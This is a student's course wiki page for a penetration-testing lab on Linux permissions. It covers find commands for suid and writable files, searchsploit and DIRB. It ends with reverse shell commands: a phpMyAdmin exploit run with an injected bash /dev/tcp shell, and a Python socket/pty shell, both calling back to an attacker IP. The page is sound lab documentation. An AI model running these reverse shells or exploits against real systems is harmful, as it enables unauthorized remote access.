Week 10 Linux Permission Vulnerabilities (SEC 335) - Chromosom3/TechNotes GitHub Wiki

Permission Vulnerability Lab

Before performing the penetration test against the target a permission vulnerability-lab was assigned. This lab consisted of learning (or refreshing your knowledge on) the basics of Linux file permissions, effective user, suid, and finding files. Specifically, we used compiled a c program to find the effective user that executed said program. Following that we worked with the file permissions and set the suid bit, file owner, and file group. After that, the lab had us look for different files with specific permissions on a remote server.

Find Command

The find command is a useful tool for this lab. The first thing we needed to find was suid programs on our local system. This was done with the command find / -perm -4000 -type f - . This command finds all the files with 4 set for the suid bit. The find command might produce some permission-denied errors. To get around that we can use the 2>/dev/null redirect to send standard error to /dev/null. The full command would be find / -perm 4000 -type f 2>/dev/null. The alternative to this command is find / -perm -u=s -type f 2>/dev/null. These commands were used to find a file on the test system.

The next thing we were tasked with finding was writable files on the test system. Again we will be redirecting permission errors to /dev/null. The command to find writeable files on the test system was find / -type f -writable 2>/dev/null. Thought this led to a lot of false positives in the /sys/ and /proc/ directories. To get around this the command was changed to find / -type f -writable -not -path '/sys/*' 2>/dev/null | grep -v /proc.

Target: Nancurunir.shire.org

Searchspolit

Using Searchsploit allows you to view exploit code via the command line. This uses ExploitDB for the backend. Once you find an exploit you can use searchsploit to copy the code to your current directory for execution. This can be seen in the images below.

Untitled

Untitled 1

DIRB

The DIRB command was used to find folders on the system. For more information on DIRB see this wiki entry.

Reverse Shell

Reverse shells were used to establish a foothold in the system. For more information on reverse shells see this wiki entry. The specific commands used for this lab are shown below.

# On Kali
nc -lvp 5055
# On Kali (Replace 10.0.5.28 with Target IP)
python2 ./50457.py 10.0.5.28 80 /phpmyadmin/index.php gandalf shallnotpass "/bin/bash -c 'bash -i > /dev/tcp/10.0.99.36/5055 0>&1'"

# On Kali
nc -lvp 5056
# In bash reverse shell
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.99.36",5056));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'